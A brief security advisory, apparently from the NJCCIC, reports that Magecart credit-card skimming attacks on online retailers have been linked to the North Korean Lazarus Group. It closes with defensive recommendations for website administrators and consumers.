Recent Magecart Attacks Linked to North Korean APT

Summary

New research reveals that recent skimming attacks can be attributed to the North Korean government-affiliated advanced persistent threat (APT) group known as the Lazarus Group or HIDDEN COBRA. These types of skimming attacks, also known as Magecart , have been active since May 2019, and are linked to the APT group through known infrastructure and unique patterns in malware code used in previously attributed campaigns. To evade detection and monetize skimming efforts, HIDDEN COBRA developed a global exfiltration network using compromised websites to harvest credit card data. Additionally, several domain names closely resembling consumer brands were registered anonymously and used to load malicious script and collect card information. Victims include dozens of retailers such as Claire’s , Focus Camera, and Paper Source. Several exfiltration nodes have also been identified globally, including an Italian modeling agency and a NJ bookstore. Though the APT group has been tied with financially-motivated cyber-attacks in response to imposed sanctions on North Korea, this is the first instance of attributed Magecart activity. As consumers adjust to pandemic conditions and make more purchases via online shopping, retailers have been increasingly targeted by skimming attacks.

Recommendations

The NJCCIC recommends website administrators monitor their systems for malicious activity, use only vetted first-party code, ensure hardware and software is up to date, use a web application firewall (WAF) to block and alert for potential code injection attacks, block unauthorized transmission of personal data by implementing a Content Security Policy (CSP), and schedule routine website scans to identify changes in JavaScript code composition. Additionally, we encourage online consumers to follow recommendations provided in the NJCCIC alert, Online Shopping and Cybersecurity. Technical details and Indicators of Compromise (IoCs) can be found in the Sansec article.